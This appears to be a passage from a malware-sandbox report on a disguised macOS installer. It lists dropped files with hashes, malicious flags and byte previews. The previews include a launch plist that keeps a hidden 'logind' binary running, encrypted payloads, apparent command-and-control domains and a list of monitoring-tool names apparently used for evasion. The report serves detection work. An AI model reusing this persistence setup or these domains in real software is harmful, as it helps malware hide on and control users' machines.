File Type:	Mach-O 64-bit x86_64 kext bundle, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL>
Size (bytes):	20392
Entropy (8bit):	3.754200852282905
Encrypted:	false
MD5:	F9A9EE0285B855E7A0CE5F2F42D53E90
SHA1:	18E1D03E41B5FC6D54FDDA340FE2DAB219502F3D
SHA-256:	65C89525EA4DA91500C021E5AC3CB67CF2C29086CCA3EF7C75A44AC38CC1CCE5
SHA-512:	EDFB15E34B802B86C99FF2A4F82FB704FB805D77B8ADA82F16D604130E508FC3F6F950FEE0BB1D565E0081CEABBCA9AF3F776B615D7D9C841C9D05F3630C3413
Malicious:	true
Reputation:	low
Preview:	....................................8...__TEXT................... ............... ......................__text..........__TEXT..........................................................__cstring.......__TEXT..........z...............z...............................__const.........__TEXT..................................................................__DATA........... .......P....... ..............................__got...........__DATA........... ............... ..............................__data..........__DATA........... ............... ..............................__bss...........__DATA...........!..............................................__common........__DATA.......... !......H@..........................................H...__LINKEDIT.......p....... .......0......................................@0.......A..........P.............../............................................@..(....0...................b7.....,i`................................................................

/Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/Resources/en.lproj/InfoPlist.strings Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	Little-endian UTF-16 Unicode text
Size (bytes):	92
Entropy (8bit):	3.2610300066712608
Encrypted:	false
MD5:	51EF59B60E5B41B91519CC662A9FE886
SHA1:	3222CA0C39EB50AAF8126BAF852E55430C4718AF
SHA-256:	39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
SHA-512:	3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
Malicious:	false
Reputation:	low
Preview:	../.. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. ../.....

/Users/ben/Library/Caches/org.logind.ctp.archive/logind.plist Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	XML 1.0 document, ASCII text
Size (bytes):	431
Entropy (8bit):	5.189119297678073
Encrypted:	false
MD5:	CD423C6483AA921FB17EE515A7689801
SHA1:	A2ABA86D5D763F311DFF8250BC8FE98DE958BFF4
SHA-256:	69FD7D2B8B067D211D197AAA0B6CACA48882274B6FFD6549BFC84DF551E981EB
SHA-512:	D379BFA2D280D8B873E42A78E54007E0C5BB05C248A777D8377B191FC14D3FF1B846FD605314A8AC6744291E9747EC28CC88C7917B8986EB0F4C656336FC581B
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>Label</key>..<string>org.logind</string>..<key>ProgramArguments</key>..<array>...<string>/private/etc/logind</string>..</array>..<key>RunAtLoad</key>..<true/>..<key>KeepAlive</key>..<dict>...<key>SuccessfulExit</key>...<false/>..</dict>.</dict>.</plist>.

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Info.plist Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	XML 1.0 document, ASCII text
Size (bytes):	1286
Entropy (8bit):	5.152762673307581
Encrypted:	false
MD5:	68D9B079E8808F2C70B14DADEFDA776F
SHA1:	1212502292B2CBF162B93CD8906947DA604E169A
SHA-256:	0F03545F51CC2CF9FD42AF87F1C5F23F28DCD24FAA2CF7A3AD475C632B9ADAC7
SHA-512:	57943A9C3AFBFD385DBEA193DF84BF8DD2AAC7F29C6CE2842C4AB683848249558CB2D479E17816831B369BD92B0F5F084D3E5E994F5FE449198C7FC0E4FADCD3
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>12F2560</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>logind</string>..<key>CFBundleIdentifier</key>..<string>org.logind</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>logind</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.obfuscator.3_4</string>..<key>DTPlatformBuild</key>..<string>5A3005</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>13A595</string>..<key>DTSDKName</key>..<str

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/MacOS/logind Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Size (bytes):	536860
Entropy (8bit):	6.15718922332066
Encrypted:	false
MD5:	262C9241B5F50293CB972C0E93D5D5FC
SHA1:	D3DAB40D51E1B4FF332B6BE1C993C916C3D58481
SHA-256:	1CF36A2D8A2206CB4758DCDBD0274F21E6F437079EA39772E821A32A76271D46
SHA-512:	5F4881709F909FEA3643B8D2DB6AD501083662AA48A6DF8BC7815427923D4FB95F90CA8E3D54794364F3EE4CF0AEAEBEA220680C859AA250A0CE40064B3B4C74
Malicious:	true
Reputation:	low
Preview:	....................p..... .........H...__PAGEZERO..........................................................(...__TEXT..........................................................__text..........__TEXT..........p.......4.......p...............................__stubs.........__TEXT..................l.......................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__unwind_info...__TEXT..........................................................__eh_frame......__TEXT..................................................................__DATA..........................................................__program_vars..__DATA..................(.......................................__got...........__DATA..........(...............(...............................__nl_symbol_ptr.__DATA..........0...............0...............................__la_symbol_ptr.__DATA..........

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/PkgInfo Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	ASCII text, with no line terminators
Size (bytes):	8
Entropy (8bit):	1.75
Encrypted:	false
MD5:	23B7D7D024ABB0F558420E098800BF27
SHA1:	9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:	82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:	F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	APPL????

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/7f.bundle/Contents/Info.plist Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	XML 1.0 document, ASCII text
Size (bytes):	1127
Entropy (8bit):	5.185447818393585
Encrypted:	false
MD5:	C6E364E9E7D6FCEB02A61686BB56A7D4
SHA1:	2FF0AEEB36EDA1801067D38215B4416B636212B1
SHA-256:	C5BD39D06D59AB1B47210F30905DA2092D1F8713EE924DEC61BFCE6BE728AB12
SHA-512:	8169B91B85D9D93010944E3C90F846347D7269989E9785ABF7F44E7254B32FD9FDB5792FA245B821738E63EA3DE255527B36F6F3C216734E77935285E4BCA806
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>12F45</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>7f</string>..<key>CFBundleIdentifier</key>..<string>org.logind.7f</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>7f</string>..<key>CFBundlePackageType</key>..<string>BNDL</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.obfuscator.3_4</string>..<key>DTPlatformBuild</key>..<string>5A3005</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>13A595</string>..<key>DTSDKName</key>..<string>mac

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/7f.bundle/Contents/MacOS/7f Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	data
Size (bytes):	200720
Entropy (8bit):	7.999144288739545
Encrypted:	true
MD5:	9682343D1620100CEDCFCC035131B967
SHA1:	CD618FC73ED0F1DDD7051C2CE59C73647F6EF8AB
SHA-256:	91D9ECD88D2DD534F9942A3814A282232952C480507217A62AA1D3153FAC75EF
SHA-512:	2CD52038D10316408B6C6BB7461102BD028C8D8AAE909249D601A382B03B244BD5CAA599D2F491DA34F84E2334E80DED4E4558E791E62533F96227FAF6C87FD4
Malicious:	false
Reputation:	low
Preview:	.......q..g.G.tH....O.Dw......p.{D.!..}.2...a"l.....q".f.._.vH.,.8E.XC.......?C.b.f.....\|j..#^..DOr.X..]....yva-.,..DvN.......?+...&.......]....E.S....&.....$59..3..gE...\|Y'H.nM'.....7....e* &.2h.._...............?..$.?y(K.aU...T.-..vDj%.I.....&..N.&_.).c.j....f..Y.%l.]>...~.+.Q......f.i.G.=..L........oB..7z...8H....H......g....2?y.^....B..+..h)...\.5fz..l.....XA..BK..m.4D..V$p..7.4..VZ]...w..#..).G.b..........e.....r%......9.n...(.........O.I.......a.E.QB.....u..aR[S".}.h..y..4....~...u......Q...D. E>.f8W.>R.....QU..(..&.;.i..}...z?d..P..}$...\|"...j.,I.S.::......E...\|{17.mP.@)a.{%...m.-...E.....$..fg.-...............mH.?....0.g........Q<.}t>".4?.@.P....V.......3...x_)<[.....si?.-.%..u.[.....F4a..%.gv.q.yr.b]@.=.5.......n..T.r.."7.AY.v..R....x.Mf`.....pD..i._b....[N..}...i8.`..9..}..3.O.cX&p....T......./o.3;...^ks....H.b...E.sH%i.Kes_.......Y..9..NO._.....g.'mb.\|.0.-.4....uU8...f....,=............9...A......H...K._.~CeS..u...t~*.z

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/7f.bundle/Contents/Resources/7FC.dat Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	data
Size (bytes):	2400
Entropy (8bit):	7.861287963563085
Encrypted:	false
MD5:	CE14153BBE94DE5089F10899D203E0DF
SHA1:	91701AD449BABD709B023B717D08C10585A5FF06
SHA-256:	98C6A414D444AEC7B634A575571E3BB5580788AE242B04AE990A75907F1C74D8
SHA-512:	F7426E20EC1565E5E60A44E5B5B7A8295F1E524803FE7663DE821F6F53DB6C4F0D742AE1BDE20219D88F4970D7B716E276C429A902D8F82443DAFF364CE443A5
Malicious:	false
Reputation:	low
Preview:	&.0.."0....H.............0.........4...=.E.E..<.....)...(.J...2Y.lz..Y.._..r......+ /.S.q.>.L...:H.t..jv.;]..^..b.e%..\.....hK%.OJ..83 ...../....D....t...u...mNyC%'...V...........X...w.tKt...........G.\.u<i....n.l.;E..(`....`._....pN.4a.....ud..a...._qte8..p._...WF.?....<........&.0.."0....H.............0............5H...S.H..6.....(.D.J..i.;.P`\.../...x...d....X...:....0t++ [...v..L..f......a.(64....n.i.wHY1O..u...}........)v..-.).p...(.=\.6......D.6.``...>Tln....zC.rW2q.MFQ.R...~q.........A...._..=x..J...)...<zD....c.V.>..)O;...KP........F.u....u...E.....=.0..9....A......P..G.8{..p..vh..?. ..Z_./...m...].5.{T:e.v...a$..c..v........@{.....t..(.K..L.......".B1[...j..0..$......y$].Y59.r.P3!. ...5.!..v.\|.k...v=&.f.e4...S.$.:YV.....!..e.......+.^.Dh......V'..\|.._... >d'..u..."...&&.ma....X..#o.W. ....F.j?..2..S.D...mps../.... 2.G..9.]2...v.=..Y.0..^..iC...0.............P.........n&d.M.{y;.{....;.."./.[v..%.+..I..T.D.\.. .RT\|.W......E

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/7f.bundle/Contents/Resources/AAC.dat Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	data
Size (bytes):	912
Entropy (8bit):	7.6712841679583885
Encrypted:	false
MD5:	8B0EF78CAA583D6B16C15C30A85C9B94
SHA1:	A52641E681E26BBD2E4DC09A5B46B6336DA5D873
SHA-256:	BD5BEAA38674858BAB80BD623873865F561953F41B0AE2FBB85056CAF42C6A2E
SHA-512:	1C8FAD65A89D9C760C21277CFC822E7768628A061AACC053B7B2C9D303AA2AEE85AA137C50A9AFFF92E5B83E68BC5BDBBA5E75DC238D7DFDE063C65439B9072C
Malicious:	false
Reputation:	low
Preview:	&.0.."0....H.............0.............4F,.B....fAL.QQ...S8d.15X..53,Q....d..A.{._o....R....."CH.&a.$H.....}L6;...`..K1...a.7.t..c..4.f4..M.H.....?).+aT(FD....G...M...b..Bj..hAj........I..e.UF...8..P....j......%nb...T.'.y]...i...:0..k....7...s..Of3H.@~.....u..1I{.6.G/.......&.0.."0....H.............0.........7.`.oA...L....G.Ef...&.....-\.:..O..4....K.].j@........ .1.x..<.Hg]+Qbv.(.IIX......l.U`..N+#..P..t.4.".Kt..+...+.Y-8....).2.......og/=.b&...R..}....:.g.N[..W......f.>s.$...).ZsJU....BI....wh..s....fj...U6.......~.(m.....N......m?.1.G.1.....>.0..:....A.....Q.-.T...<...U.....n..o.t.....X.F....qE...h...v....y.g.#N.......@..S'.A..=...........O..W`W:....Kp..F;K....c1.[.k.....].?fu.AozQ.!..W.^..{...X.....Fe)E.$..(b9..!..S......H)%.2d.7.f@k[fkv..'.. ..m$..y.y.u..{...4..w*R....<..;u. .ya...........p....44..+n3[..7).!...Q..F..j/......PvN't.ds/.....

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/80C.dat Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	data
Size (bytes):	2985
Entropy (8bit):	4.062279591173413
Encrypted:	false
MD5:	314B26830CF9503A096C352EC5CAD4AA
SHA1:	7536C0BE420A4C32860784D6DD6A835DAC573881
SHA-256:	342F199626839FAEEA4CD06B0968F2997B3981A18D113AB2FC04A71FC3B75099
SHA-512:	404B9E6062995B01678C755BDE525266C8C580CE71EF80180AAD4B25EC9A9BB6DC7668C3D462FAD8C91710E7DFD913BB8194C6F77F34B98CD8B5D65586BF2D68
Malicious:	false
Reputation:	low
Preview:	.............1......P...........@...........@............5..A.R.A.0.8.4.8.....@6..@.......p7..ms-srv-cdn-upd4.com....p7..svr-upd-ms006.com....p7..e-upd-cdn8.net....p7..svcupdater.com....p7..smartupdate.co....@8..........@8..P.......@8..5.......@8..............A.R.A.0.8.4.8.....@..........@!..........@.......(....:..0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.....@;..........0@.......@L..........@A...........>..M.o.n.i.t.o.r.i.n.g...t.a.s.k.m.g.r...W.i.n.d.o.w.s. .T.a.s.k. .M.a.n.a.g.e.r...A.c.c.e.s.s.E.n.u.m...A.c.c.e.s.s.E.n.u.m...A.D.E.x.p.l.o.r.e.r...A.c.t.i.v.e. .D.i.r.e.c.t.o.r.y. .E.x.p.l.o.r.e.r...A.D.I.n.s.i.g.h.t...I.n.s.i.g.h.t. .f.o.r. .A.c.t.i.v.e. .D.i.r.e.c.t.o.r.y...A.u.t.o.l.o.g.o.n...A.u.t.o.l.o.g.o.n...a.u.t.o.r.u.n.s...A.u.t.o.r.u.n.s...B.g.i.n.f.o...B.G.I.n.f.o...C.a.c.h.e.s.e.t...C.a.c.h.e.s.e.t...D.b.g.v.i.e.w...D.e.b.u.g. .V.i.e.w...D.e.s.k.t.o.p.s...D.e.s.k.t.o.p.s...d.i.s.k.2.v.h.d...D.i.s.k.2.v.h.d...D.i.s.k.m.o.n...D.i.s.k. .M.o.n.i.t.o.r...D.i.s.k.V.i.e.w...L.o.a.d.O.r

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/dataPkg Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	data
Size (bytes):	946496
Entropy (8bit):	7.999808763781933
Encrypted:	true
MD5:	0A51ADB6B4C10B7AF6BFD93887502ECF
SHA1:	AA7EB3F21463FD61DE14E40C1ADBEA285836C6B3
SHA-256:	50C5FF69B60A9A6A03796F442B6F16D7E0E639BEE13B915E2FEBD4A631B00017
SHA-512:	1AB51C55C49E0BB888780264756BE2A0875EEFB65EC1859EA44217287392A41340DFDF5208321D8434D5061A94C1AEDB4F69599E5CB14F5CF2FC59502BDFAC56
Malicious:	false
Reputation:	low
Preview:	...dH..k.@5.q....3Y.l.<.tg.I..G......C.y.. .^{.[Z!.............tm.....4E!;5.}... ....E..#.....AZ...l...Fn{...... ....W....Pv...f.mY>....~......$....0..nR.I.....(@#r..........7.C:..!.....E.\..Kf....~..yb/........(..g..Mr...../.5.....E...9.#.s.-..p#.U..}i....G.9.:.....I..}zn.i3.?..q.W.c...:.:rf.G...>w5....Z.?.".G..X=.K...u~.N$.Q....T.......`.W...1X.....o....W.G3.....A.N....7....8......jj.C.M..i.W.k...?.... .{........jw>.r.^K.-.K)...aW.u...D;.^hN...&hA...-...d..n/k.B.g..(h.1.se.E...\-.4..H.\|...<.=)y5A..{.^..Q,..# Q...6....Y...w..l.Jq.[.M,`wv.0['.[..T..__9x..(}"..........h.w A>L.7q.....4w.N... m.];X..t...."=...oG......].LR]w...L.4.\....,#5...'...n.(.R.[.S......W.....h~ ...:A.Z.N(....S.7.d.$s......#.vI....}.Y...8pj\|TS...".Z.....^j~...6...Gj.....%(r.m1S.".2.x....V.....6..w.8..&..\|.n......\.....F.'+....U..I..z..C#.Gf{.$,..>H'..?Gx)`.%..1I.#v...T.]P..a_.=..X...99AHG..U.i..........9.D.b.e'...:.u.42...N6Kc....sL...2.c...m..4.@..a..$.0#

/Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/logind.plist Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	XML 1.0 document, ASCII text
Size (bytes):	431
Entropy (8bit):	5.189119297678073
Encrypted:	false
MD5:	CD423C6483AA921FB17EE515A7689801
SHA1:	A2ABA86D5D763F311DFF8250BC8FE98DE958BFF4
SHA-256:	69FD7D2B8B067D211D197AAA0B6CACA48882274B6FFD6549BFC84DF551E981EB
SHA-512:	D379BFA2D280D8B873E42A78E54007E0C5BB05C248A777D8377B191FC14D3FF1B846FD605314A8AC6744291E9747EC28CC88C7917B8986EB0F4C656336FC581B
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>Label</key>..<string>org.logind</string>..<key>ProgramArguments</key>..<array>...<string>/private/etc/logind</string>..</array>..<key>RunAtLoad</key>..<true/>..<key>KeepAlive</key>..<dict>...<key>SuccessfulExit</key>...<false/>..</dict>.</dict>.</plist>.

/dev/null Download File
Process:	/sbin/kextload
File Type:	ASCII text
Size (bytes):	150
Entropy (8bit):	4.537814289698178
Encrypted:	false
MD5:	81D61C267AEE564B505412337662F299
SHA1:	4B672E59EDBDA06B55CB318BF3C1F023D0870F80
SHA-256:	5402F8AAAA604456071E2B3B82D8108206AD9A3AB64D256B16F0C8478F4BFBA6
SHA-512:	70183CAFE231354DC3B25AE38437A4DB98CA7DEC7EEF2CFA1A685E7B5AE6A87B2AF7D5401AD8C4D3C8665D9F095A1502A2B3BB3E4C2282DF2D7086BBE1A3A079
Malicious:	false
Reputation:	low
Preview:	/System/Library/Extensions/logind.kext failed to load - (libkern/kext) function disabled; check the system/kernel logs for errors or try kextutil(8)..

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/C/com.adobe.air.ApplicationInstaller/com.apple.metal/3902/libraries.maps Download File
Process:	/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer
File Type:	data
Size (bytes):	2048
Entropy (8bit):	1.3676226844815629
Encrypted:	false
MD5:	24B8E04AD85E01ACC1478FF0E70ABE02
SHA1:	67D7C10A26ACC7C94A0EE0B0E22EB922C4E4EEAE
SHA-256:	03A56D12DE004BA5D66594E1E7EF10AEEE71B4F4F3622F5CA2D75CDCF7AB0198
SHA-512:	CAC2F1A544D0F3617FA106AC6209395BB0F1E29E76DE461BBBCA9FEDA190B892607680D14C3B10540917ADD5FBC17E11F427B057FC180D4F67BC36AB462ECAEA
Malicious:	false
Preview:	...............X......X......................................................................................................................X...............................................................................................................................................................................................................................................................................................................................................................................................................n.'0.Q...b.>.....d.B.8.....7.........E6'.........................................2......kB&..L../.E.[.Ea(./y!.....................................................................................................................................................................................................................................................................................................................................................

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/C/com.adobe.air.ApplicationInstaller/com.apple.metal/Intel Iris Graphics/functions.maps Download File
Process:	/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer
File Type:	data
Size (bytes):	2048
Entropy (8bit):	1.3663940621701836
Encrypted:	false
MD5:	6A965913C9AFD60ED9613E93306E4310
SHA1:	2EAF2618CD67BA34F321E0DAFD6D166CD3FB90E1
SHA-256:	63F0B3302EA9E6B1D71216B9A502891EAD6F6582A73F72A48407042A2E7A7218
SHA-512:	630349078CCEBE46E0BBC0E59330DF06C664949F8350CDD604D04279B27A1A162D5C0A2C7354B918067CF7B3A2BC1910FAAF4CD4B11B235880A4EEA5CD47936B
Malicious:	false
Preview:	.D.............XF.....XF.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................XF.............}.h.TB6B..y...`m.3........u...........E6'..........................................4a.t%/..[u....$f.]..G....g4...............P......................................................................................................................................................................................................................................................................................................................................

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/C/mds/mdsObject.db_ Download File
Process:	/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer
File Type:	Mac OS X Keychain File
Size (bytes):	26424
Entropy (8bit):	3.5110922853353324
Encrypted:	false
MD5:	DAD69D3E13E06A868C370A973F2A1D0D
SHA1:	9C236BAC3BCFAED436C34CD07CBB586A1B791430
SHA-256:	7D4E41210ABC7AEF368B9E4DBEA3F170CBA2F49BFFC662A03D4D841F0B1288D3
SHA-512:	4D68684933B888EE5EF019A6578F515A5EF655ADEA1A3718B6E4189586B6492E063F3FEB6905B764A94C456AEEB6255A8D5988DD529B76DD0D82F62B0F2B4159
Malicious:	false
Preview:	kych.......................................d...................0...............0...p...........@...@.......................!...%........CSSM_DL_DB_SCHEMA_INFO.....D.......................!...%........CSSM_DL_DB_SCHEMA_ATTRIBUTES...D.......................!...%........CSSM_DL_DB_SCHEMA_INDEXES......H.......................!...%....... CSSM_DL_DB_SCHEMA_PARSING_MODULE...@.......................!...%@.......MDS_OBJECT_RECORDTYPE..............h........... ...`........... ...@.......................-...1...5...9...=@..............................X...............P................... ...p...........l...........d...........P...........H...........,...............h...........P.......................1...5...9...=.......M................RelationID.........P.......................1...5...9...=.......M................RelationName.......P.......................1...5...9...=.......M................RelationID.........P.......................1...5...9...=.......M................AttributeID........X....

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/AIRInstaller.dmg Download File
Process:	/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/installer
File Type:	zlib compressed data
Size (bytes):	20809548
Entropy (8bit):	7.853712835794995
Encrypted:	false
MD5:	CC9BB82F417C73B3AD7EFD12ECFDFE77
SHA1:	6345BEFA425DBDFE503A4F98A9C3DCA4EF439073
SHA-256:	415FC0B9C0156B980D6EBE14F7F057524E7C52AAF887795285C4D951E42819FA
SHA-512:	B9ED5BB3A2D099C0F0BD7474FAA253CD29928FBAED3AF48A0805DFE6E94405ED257117F05C43DD07A2EFE1CB1ED7145A36EC8488B63844C9AF13683378D7F262
Malicious:	false
Preview:	x.su.T.p..a``d.a``..`..R@......f(A.}P..O...u.....N..U...@u .._M.H..A....%..x.c`..C8.........^X...d........qx....A.......o.T.Da..hT&.......Z.N>.0.Be.C.\|....5....d2.%UQ...w.w....y..f........c.E.Y...U.......... @....... @....... @....... @....... @....... @....... @....... @...7'..Dx.su.T.p..a``d.a``..%S.H1..............K>.~.{".{.....:..C....@....2....<..B9.2x....A.......o.T.Da..hT&.......Z.N>.0.Be.C.\|....5....d2.%UQ...w.w....y..f........c.E.Y...U.......... @....... @....... @....... @....... @....... @....... @....... @...7'..D@....@.....8j...N...x...f`i``d04.3`...w.I....fCi...A...u.."......0.H....H.+x...lS..3!. .@.n.N}...H.....f`...LP..'..............v....<.]........x....XUU.?~QQ....QZQY.,.....zo]..2......2..[.N.l.l.h.....-..4.d....t.,Kp...\|.>..`.o....y....^{..^{.}<Fy.'....?.?\.....1...m....9...CN.nsj.S.....pA..r.gb...E.dO*Z.....(.gh..9..<fy..>....ouW.@./....^.eQ.M.rJ<a.8.%.K...n.'..GF.fB..~.&.z...t.m...n.w.dU....=..0...$.....(........j..}.<..

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/cds.crl Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan
File Type:	data
Size (bytes):	637
Entropy (8bit):	6.973831978341859
Encrypted:	false
MD5:	974E8536B8767AC5BE204F35D16F73E8
SHA1:	E847897947A3DB26E35CB7D490C688E8C410DFB7
SHA-256:	D1BB4B163FE01ACC368A92B385BB0BD3A9FC2340B6D485B77A20553A713166D3
SHA-512:	CDA3696B274493D5504976819D83550EC074E41206F15B40C0A9A5FC84C1C966711C96ACA5F86B0650464BC00133ECDA86593EEEE8B15C55318E0683434B5E29
Malicious:	true
Preview:	0..y0..a...0....H........0i1.0...U....US1#0!..U....Adobe Systems Incorporated1.0...U....Adobe Trust Services1.0...U....Adobe Root CA..180711000000Z..230109235959Z0..0!...........-..1.....100917203246Z0#..>.....040117013929Z0.0...U.......0#..>.....040117010905Z0.0...U.......0#..>.....100107183437Z0.0...U......../0-0...U.#..0.....8J......T.......0...U.......0....H...............c_F..?"....NG.q.i.7..y.Z..]d*.x.D..lr....`.HO.k.N..3.\|...'9C...F...{.6.,...C...V.....-...}.L.4..[.fc...../..D..y...e>Y........F....6..6.s.n.O.r......a........sJ0........ .u......SnP.?.`..F..%."x.9..J...x.^...9...c..T}.9...........Z.).{O..kd.

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/installer Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Size (bytes):	20823972
Entropy (8bit):	7.851965346109969
Encrypted:	false
MD5:	D420588E1C469C13850ED3C4656835DD
SHA1:	3C50F74823C864EF42CF95DD2416AD8F42D591AA
SHA-256:	AC1DCCF22F313A2E370DAAA2F9E379B8582F77FA59081677CA9807BFE634C96A
SHA-512:	4FC99272EC80F41978CCE06148ED302E78D66C74E490745E96846651F3F337C10F0BAAB112705FBBEFF469C29E723374EE496E392EBD5E7A92DA920300C3106D
Malicious:	true
Preview:	.......................... .........H...__PAGEZERO..........................................................x...__TEXT................... ............... ......................__text..........__TEXT..................=.......................................__stubs.........__TEXT..................B.......................................__stub_helper...__TEXT..................~.......................................__objc_methname.__TEXT..................S.......................................__cstring.......__TEXT..........................................................__unwind_info...__TEXT..........h.......P.......h...............................__eh_frame......__TEXT..................H...............................................__DATA........... ............... ..............................__program_vars..__DATA........... ......(........ ..............................__got...........__DATA..........( ..............( ..............................__nl_symbol_ptr.__DATA..........

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/installer.p7 Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan
File Type:	data
Size (bytes):	3860
Entropy (8bit):	7.2908174069558385
Encrypted:	false
MD5:	7486C2CA97CE34FFF33AAB501C336D27
